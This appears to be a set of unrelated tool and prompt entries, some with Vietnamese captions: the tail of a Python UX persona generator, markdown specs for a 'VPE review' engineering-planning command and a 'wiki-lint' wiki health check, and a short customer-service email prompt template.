def generate_persona_from_data(self, user_data: List[Dict],
interview_insights: List[Dict] = None) -> Dict:
"""Generate persona from user data and optional interview insights"""
# Analyze user data for patterns
patterns = self._analyze_user_patterns(user_data)
# Identify persona archetype
archetype = self._identify_archetype(patterns)
# Generate persona
persona = {
'name': self._generate_name(archetype),
'archetype': archetype,
'tagline': self._generate_tagline(patterns),
'demographics': self._aggregate_demographics(user_data),
'psychographics': self._extract_psychographics(patterns, interview_insights),
'behaviors': self._analyze_behaviors(user_data),
'needs_and_goals': self._identify_needs(patterns, interview_insights),
'frustrations': self._extract_frustrations(patterns, interview_insights),
'scenarios': self._generate_scenarios(archetype, patterns),
'quote': self._select_quote(interview_insights, archetype),
'data_points': self._calculate_data_points(user_data),
'design_implications': self._derive_design_implications(patterns)
}
return persona
def _analyze_user_patterns(self, user_data: List[Dict]) -> Dict:
"""Analyze patterns in user data"""
patterns = {
'usage_frequency': defaultdict(int),
'feature_usage': defaultdict(int),
'devices': defaultdict(int),
'contexts': defaultdict(int),
'pain_points': [],
'success_metrics': []
}
for user in user_data:
# Frequency patterns
freq = user.get('usage_frequency', 'medium')
patterns['usage_frequency'][freq] += 1
# Feature usage
for feature in user.get('features_used', []):
patterns['feature_usage'][feature] += 1
# Device patterns
device = user.get('primary_device', 'desktop')
patterns['devices'][device] += 1
# Context patterns
context = user.get('usage_context', 'work')
patterns['contexts'][context] += 1
# Pain points
if 'pain_points' in user:
patterns['pain_points'].extend(user['pain_points'])
return patterns
def _identify_archetype(self, patterns: Dict) -> str:
"""Identify persona archetype based on patterns"""
# Simple heuristic-based archetype identification
freq_pattern = max(patterns['usage_frequency'].items(), key=lambda x: x[1])[0] if patterns['usage_frequency'] else 'medium'
device_pattern = max(patterns['devices'].items(), key=lambda x: x[1])[0] if patterns['devices'] else 'desktop'
if freq_pattern == 'daily' and len(patterns['feature_usage']) > 10:
return 'power_user'
elif device_pattern in ['mobile', 'tablet']:
return 'mobile_first'
elif patterns['contexts'].get('work', 0) > patterns['contexts'].get('personal', 0):
return 'business_user'
else:
return 'casual_user'
def _generate_name(self, archetype: str) -> str:
"""Generate persona name based on archetype"""
names = {
'power_user': ['Alex', 'Sam', 'Jordan', 'Morgan'],
'casual_user': ['Pat', 'Jamie', 'Casey', 'Riley'],
'business_user': ['Taylor', 'Cameron', 'Avery', 'Blake'],
'mobile_first': ['Quinn', 'Skylar', 'River', 'Sage']
}
name_pool = names.get(archetype, names['casual_user'])
first_name = random.choice(name_pool)
roles = {
'power_user': 'the Power User',
'casual_user': 'the Casual User',
'business_user': 'the Business Professional',
'mobile_first': 'the Mobile Native'
}
return f"{first_name} {roles[archetype]}"
def _generate_tagline(self, patterns: Dict) -> str:
"""Generate persona tagline"""
freq = max(patterns['usage_frequency'].items(), key=lambda x: x[1])[0] if patterns['usage_frequency'] else 'regular'
context = max(patterns['contexts'].items(), key=lambda x: x[1])[0] if patterns['contexts'] else 'general'
return f"A {freq} user who primarily uses the product for {context} purposes"
def _aggregate_demographics(self, user_data: List[Dict]) -> Dict:
"""Aggregate demographic information"""
demographics = {
'age_range': '',
'location_type': '',
'occupation_category': '',
'education_level': '',
'tech_proficiency': ''
}
if not user_data:
return demographics
# Age range
ages = [u.get('age', 30) for u in user_data if 'age' in u]
if ages:
avg_age = sum(ages) / len(ages)
if avg_age < 25:
demographics['age_range'] = '18-24'
elif avg_age < 35:
demographics['age_range'] = '25-34'
elif avg_age < 45:
demographics['age_range'] = '35-44'
else:
demographics['age_range'] = '45+'
# Location type
locations = [u.get('location_type', 'urban') for u in user_data if 'location_type' in u]
if locations:
demographics['location_type'] = Counter(locations).most_common(1)[0][0]
# Tech proficiency
tech_scores = [u.get('tech_proficiency', 5) for u in user_data if 'tech_proficiency' in u]
if tech_scores:
avg_tech = sum(tech_scores) / len(tech_scores)
if avg_tech < 3:
demographics['tech_proficiency'] = 'Beginner'
elif avg_tech < 7:
demographics['tech_proficiency'] = 'Intermediate'
else:
demographics['tech_proficiency'] = 'Advanced'
return demographics
def _extract_psychographics(self, patterns: Dict, interviews: List[Dict] = None) -> Dict:
"""Extract psychographic information"""
psychographics = {
'motivations': [],
'values': [],
'attitudes': [],
'lifestyle': ''
}
# Extract from patterns
if patterns['usage_frequency'].get('daily', 0) > 0:
psychographics['motivations'].append('Efficiency')
psychographics['values'].append('Time-saving')
if patterns['devices'].get('mobile', 0) > patterns['devices'].get('desktop', 0):
psychographics['lifestyle'] = 'On-the-go, mobile-first'
psychographics['values'].append('Flexibility')
# Extract from interviews if available
if interviews:
for interview in interviews:
if 'motivations' in interview:
psychographics['motivations'].extend(interview['motivations'])
if 'values' in interview:
psychographics['values'].extend(interview['values'])
# Deduplicate
psychographics['motivations'] = list(set(psychographics['motivations']))[:5]
psychographics['values'] = list(set(psychographics['values']))[:5]
return psychographics
def _analyze_behaviors(self, user_data: List[Dict]) -> Dict:
"""Analyze user behaviors"""
behaviors = {
'usage_patterns': [],
'feature_preferences': [],
'interaction_style': '',
'learning_preference': ''
}
if not user_data:
return behaviors
# Usage patterns
frequencies = [u.get('usage_frequency', 'medium') for u in user_data]
freq_counter = Counter(frequencies)
behaviors['usage_patterns'] = [f"{freq}: {count} users" for freq, count in freq_counter.most_common(3)]
# Feature preferences
all_features = []
for user in user_data:
all_features.extend(user.get('features_used', []))
feature_counter = Counter(all_features)
behaviors['feature_preferences'] = [feat for feat, count in feature_counter.most_common(5)]
# Interaction style
if len(behaviors['feature_preferences']) > 10:
behaviors['interaction_style'] = 'Exploratory - uses many features'
else:
behaviors['interaction_style'] = 'Focused - uses core features'
return behaviors
def _identify_needs(self, patterns: Dict, interviews: List[Dict] = None) -> Dict:
"""Identify user needs and goals"""
needs = {
'primary_goals': [],
'secondary_goals': [],
'functional_needs': [],
'emotional_needs': []
}
# Derive from usage patterns
if patterns['usage_frequency'].get('daily', 0) > 0:
needs['primary_goals'].append('Complete tasks efficiently')
needs['functional_needs'].append('Speed and performance')
if patterns['contexts'].get('work', 0) > 0:
needs['primary_goals'].append('Professional productivity')
needs['functional_needs'].append('Integration with work tools')
# Common emotional needs
needs['emotional_needs'] = [
'Feel confident using the product',
'Trust the system with data',
'Feel supported when issues arise'
]
# Extract from interviews
if interviews:
for interview in interviews:
if 'goals' in interview:
needs['primary_goals'].extend(interview['goals'][:2])
if 'needs' in interview:
needs['functional_needs'].extend(interview['needs'][:3])
return needs
def _extract_frustrations(self, patterns: Dict, interviews: List[Dict] = None) -> List[str]:
"""Extract user frustrations"""
frustrations = []
# Common frustrations from patterns
if patterns['pain_points']:
frustration_counter = Counter(patterns['pain_points'])
frustrations = [pain for pain, count in frustration_counter.most_common(5)]
# Add archetype-specific frustrations if not enough from data
if len(frustrations) < 3:
frustrations.extend([
'Slow loading times',
'Confusing navigation',
'Lack of mobile optimization'
])
return frustrations[:5]
def _generate_scenarios(self, archetype: str, patterns: Dict) -> List[Dict]:
"""Generate usage scenarios"""
scenarios = []
# Common scenarios based on archetype
scenario_templates = {
'power_user': [
{
'title': 'Bulk Processing',
'context': 'Monday morning, needs to process week\'s data',
'goal': 'Complete batch operations quickly',
'steps': ['Import data', 'Apply bulk actions', 'Export results'],
'pain_points': ['No keyboard shortcuts', 'Slow processing']
}
],
'casual_user': [
{
'title': 'Quick Task',
'context': 'Needs to complete single task',
'goal': 'Get in, complete task, get out',
'steps': ['Find feature', 'Complete task', 'Save/Exit'],
'pain_points': ['Can\'t find feature', 'Too many steps']
}
],
'business_user': [
{
'title': 'Team Collaboration',
'context': 'Working with team on project',
'goal': 'Share and collaborate efficiently',
'steps': ['Create content', 'Share with team', 'Track feedback'],
'pain_points': ['No real-time collaboration', 'Poor permission management']
}
],
'mobile_first': [
{
'title': 'On-the-Go Access',
'context': 'Commuting, needs quick access',
'goal': 'Complete task on mobile',
'steps': ['Open mobile app', 'Quick action', 'Sync with desktop'],
'pain_points': ['Feature parity issues', 'Poor mobile UX']
}
]
}
return scenario_templates.get(archetype, scenario_templates['casual_user'])
def _select_quote(self, interviews: List[Dict] = None, archetype: str = 'casual_user') -> str:
"""Select representative quote"""
if interviews:
# Try to find a real quote
for interview in interviews:
if 'quotes' in interview and interview['quotes']:
return interview['quotes'][0]
# Use archetype default
return self.archetype_templates[archetype]['quote']
def _calculate_data_points(self, user_data: List[Dict]) -> Dict:
"""Calculate supporting data points"""
return {
'sample_size': len(user_data),
'confidence_level': 'High' if len(user_data) > 50 else 'Medium' if len(user_data) > 20 else 'Low',
'last_updated': 'Current',
'validation_method': 'Quantitative analysis + Qualitative interviews'
}
def _derive_design_implications(self, patterns: Dict) -> List[str]:
"""Derive design implications from persona"""
implications = []
# Based on frequency
if patterns['usage_frequency'].get('daily', 0) > patterns['usage_frequency'].get('weekly', 0):
implications.append('Optimize for speed and efficiency')
implications.append('Provide keyboard shortcuts and power features')
else:
implications.append('Focus on discoverability and guidance')
implications.append('Simplify onboarding experience')
# Based on device
if patterns['devices'].get('mobile', 0) > 0:
implications.append('Mobile-first responsive design')
implications.append('Touch-optimized interactions')
# Based on context
if patterns['contexts'].get('work', 0) > patterns['contexts'].get('personal', 0):
implications.append('Professional visual design')
implications.append('Enterprise features (SSO, audit logs)')
return implications[:5]
def format_persona_output(self, persona: Dict) -> str:
"""Format persona for display"""
output = []
output.append("=" * 60)
output.append(f"PERSONA: {persona['name']}")
output.append("=" * 60)
output.append(f"\n📝 {persona['tagline']}\n")
output.append(f"Archetype: {persona['archetype'].replace('_', ' ').title()}")
output.append(f"Quote: \"{persona['quote']}\"\n")
output.append("👤 Demographics:")
for key, value in persona['demographics'].items():
if value:
output.append(f" • {key.replace('_', ' ').title()}: {value}")
output.append("\n🧠 Psychographics:")
if persona['psychographics']['motivations']:
output.append(f" Motivations: {', '.join(persona['psychographics']['motivations'])}")
if persona['psychographics']['values']:
output.append(f" Values: {', '.join(persona['psychographics']['values'])}")
output.append("\n🎯 Goals & Needs:")
for goal in persona['needs_and_goals'].get('primary_goals', [])[:3]:
output.append(f" • {goal}")
output.append("\n😤 Frustrations:")
for frustration in persona['frustrations'][:3]:
output.append(f" • {frustration}")
output.append("\n📊 Behaviors:")
for pref in persona['behaviors'].get('feature_preferences', [])[:3]:
output.append(f" • Frequently uses: {pref}")
output.append("\n💡 Design Implications:")
for implication in persona['design_implications']:
output.append(f" → {implication}")
output.append(f"\n📈 Data: Based on {persona['data_points']['sample_size']} users")
output.append(f" Confidence: {persona['data_points']['confidence_level']}")
return "\n".join(output)
def create_sample_user_data():
"""Create sample user data for testing"""
return [
{
'user_id': f'user_{i}',
'age': 25 + (i % 30),
'usage_frequency': ['daily', 'weekly', 'monthly'][i % 3],
'features_used': ['dashboard', 'reports', 'settings', 'sharing', 'export'][:3 + (i % 3)],
'primary_device': ['desktop', 'mobile', 'tablet'][i % 3],
'usage_context': ['work', 'personal'][i % 2],
'tech_proficiency': 3 + (i % 7),
'pain_points': ['slow loading', 'confusing UI', 'missing features'][:(i % 3) + 1]
}
for i in range(30)
]
def main():
import sys
generator = PersonaGenerator()
# Create sample data
user_data = create_sample_user_data()
# Optional interview insights
interview_insights = [
{
'quotes': ["I need to see all my data in one place"],
'motivations': ['Efficiency', 'Control'],
'goals': ['Save time', 'Make better decisions']
}
]
# Generate persona
persona = generator.generate_persona_from_data(user_data, interview_insights)
# Output
if len(sys.argv) > 1 and sys.argv[1] == 'json':
print(json.dumps(persona, indent=2))
else:
print(generator.format_persona_output(persona))
if __name__ == "__main__":
main()
Chất vấn kế hoạch liên quan đến giao hàng, tuyển dụng kỹ sư, cơ cấu đội hoặc kỷ luật production, ưu tiên throughput.
--- name: "vpe-review" description: "/cs:vpe-review <plan> — Throughput-first VP of Engineering interrogation of any plan that touches delivery, eng hiring, team structure, or production discipline." --- # /cs:vpe-review — VPE Forcing Questions **Command:** `/cs:vpe-review <plan>` The throughput-first VPE pressure-tests any plan touching eng operations. Six questions before any delivery commitment, eng hiring expansion, team restructure, or production-discipline change. ## When to Run - Before quarterly delivery commitment (sprint planning, OKR review) - Before approving an eng hiring plan - Before restructuring eng teams (splitting/merging squads, adding tribes) - Before deciding whether to hire a VPE separately from CTO (or merge them) - When production incidents are increasing - When sprint velocity is dropping but everyone says "we're working hard" ## The Six VPE Questions ### 1. What's the cycle time, and where does work wait? **No DORA, no diagnosis.** - Lead Time for Changes is the single best health metric - If you can't decompose cycle time into stages, you can't fix the bottleneck - Run `delivery_throughput_analyzer.py` ### 2. What's the DORA performance level on all 4 metrics? **One Elite metric and three Lows = bad. Four Highs = healthy.** - Deployment Frequency, Lead Time, MTTR, Change Failure Rate - The worst metric defines overall level - Fix lead time first; everything else follows ### 3. Where is the hiring funnel leaking? **"Can't find good engineers" is wrong.** - Specific stage is over-filtering OR top-of-funnel volume is too low OR offer-to-accept is broken - Run `eng_hiring_funnel_calculator.py` - If offer-to-accept < 70%, comp is below market or close discipline is weak ### 4. Is the team structure healthy for the headcount? **5-9 ICs per squad; 5-8 ICs per EM; 4-6 EMs per director.** - Run `eng_team_structure_designer.py` - Manager-trigger fires when 5+ ICs have no dedicated EM - Director-trigger fires when 3+ EMs report directly to VPE/CTO ### 5. What's the production discipline maturity? **Level 1-5; aim for Level 3 at growth stage.** - On-call rotation ≥ 6 people - Severity-defined incident response with blameless postmortems - SLOs on customer-facing services (pair with `engineering/slo-architect/`) - Continuous deployment OR scheduled — not "usually one, sometimes the other" ### 6. Are we adding a VPE separately, or is CTO doing both? **If CTO is spending > 50% on management vs strategy, VPE is needed.** - Or: VPE complement when CTO is co-founder more comfortable with strategy - VPE owns operating model; CTO owns architecture - At small scale (< 20 eng), one person can do both ## Workflow ```bash # 1. Delivery throughput python ../../../skills/vpe-advisor/scripts/delivery_throughput_analyzer.py sprint_metrics.json # 2. Hiring funnel python ../../../skills/vpe-advisor/scripts/eng_hiring_funnel_calculator.py funnel.json # 3. Team structure python ../../../skills/vpe-advisor/scripts/eng_team_structure_designer.py team.json ``` ## Output Format ```markdown # VPE Review: <plan> **Date:** YYYY-MM-DD ## The Decision Being Made [throughput | hiring | structure | production | VPE-vs-CTO] ## Delivery Throughput (if applicable) - DORA overall: Elite / High / Medium / Low - Worst metric: <DF | LT | MTTR | FR> - Bottleneck: <stage> (X% of cycle time) - Top fix: <action + owner> ## Hiring Funnel (if applicable) - End-to-end conversion: X% - Weakest stage: <stage> - Pipeline gap: +N candidates needed - Top fix: <specific action> ## Team Structure (if applicable) - Recommended: <informal pods / squads / tribes> - Manager trigger fired: yes/no - Director trigger fired: yes/no - Action: <hire EM | hire director | split squad> ## Production Discipline (if applicable) - Current maturity level: 1-5 - Next practice to add: <specific> - SLO coverage: X / Y services ## Verdict 🟢 SHIP | 🟡 SHARPEN | 🔴 BLOCK ## Next Steps [3 concrete actions] ``` ## Routing - `/cs:cto-review` — for architectural causes of throughput problems - `/cs:chro-review` — for hiring funnel comp/leveling issues - `/cs:cfo-review` — for cost-per-hire envelope and eng budget - `/cs:ciso-review` — for production discipline + compliance overlap - `/cs:decide` — log the verdict - `/cs:freeze 30` — on multi-year hiring commitments ## Related - Agent: [`cs-vpe-advisor`](../../agents/cs-vpe-advisor.md) - Skill: [`vpe-advisor`](../../../skills/vpe-advisor/SKILL.md) - Adjacent: `../../../../engineering/slo-architect/`, `../../../../engineering/feature-flags-architect/`, `../../../../engineering/chaos-engineering/` --- **Version:** 1.0.0
Kiểm tra vault LLM Wiki: trang mồ côi, link hỏng, trang cũ, mâu thuẫn, thiếu tham chiếu chéo; xuất báo cáo gợi ý hành động.
--- name: wiki-lint description: Run a health check on the LLM Wiki vault — mechanical checks (orphans, broken links, stale pages, missing frontmatter, log gap, duplicates) plus semantic checks (contradictions, cross-reference gaps, concepts missing their own page). Outputs a markdown report with suggested actions. Usage /wiki-lint [--stale-days N] [--log-gap-days N] --- # /wiki-lint Health-check the wiki. Surfaces orphan pages, broken wikilinks, stale claims, missing frontmatter, contradictions, and structural drift. **Reports, doesn't silently fix** — you decide what to change. Run this weekly, after batch ingests, and always before sharing the wiki. ## Usage ``` /wiki-lint /wiki-lint --stale-days 60 /wiki-lint --log-gap-days 7 ``` ## What happens ### Pass 1 — Mechanical (scripts) - `scripts/lint_wiki.py` — orphans, broken links, stale pages, missing frontmatter, duplicate titles, log gap - `scripts/graph_analyzer.py` — hubs, sinks, connected components, graph stats ### Pass 2 — Semantic (LLM reads and thinks) - Contradictions between recently-updated pages - Stale claims superseded by newer sources - Concepts mentioned in plain text across 3+ pages without their own page - Cross-reference gaps (entities mentioned but not wikilinked) - Index drift (index.md out of sync with wiki/) ### Pass 3 — Report A markdown report grouped by severity: ```markdown # Wiki lint — <date> **Total pages:** N **Components:** N **Last log:** <date> ## Found - ⚠️ <N> contradictions (list) - <N> orphans - <N> broken links - <N> stale pages - ... ## Suggested actions 1. Investigate contradiction between [[sources/a]] and [[sources/b]] 2. Create concept page for "<name>" 3. Fix broken link in [[concepts/x]] 4. Re-ingest [[sources/c]] — stale + contradicted 5. ... ``` Then appends a `lint` entry to `log.md`. ## Sub-agent Dispatches the `wiki-linter` sub-agent. See `agents/wiki-linter.md`. ## Scripts - `engineering/llm-wiki/scripts/lint_wiki.py` - `engineering/llm-wiki/scripts/graph_analyzer.py` - `engineering/llm-wiki/scripts/append_log.py` ## Frequency | Trigger | Pass | |---|---| | Weekly | Mechanical only — fast | | After batch ingest | Full (mechanical + semantic) | | Monthly | Full + structural review | | Before sharing | Full + extra review | ## Skill Reference → `engineering/llm-wiki/SKILL.md` → `engineering/llm-wiki/references/lint-workflow.md`
Mẫu prompt viết email trả lời khách, giọng lịch sự, ngắn gọn.
Bạn là nhân viên chăm sóc khách hàng của Elmich. Hãy viết email trả lời cho nội dung sau, giọng lịch sự, tối đa 150 từ:
noi_dung_khach_hang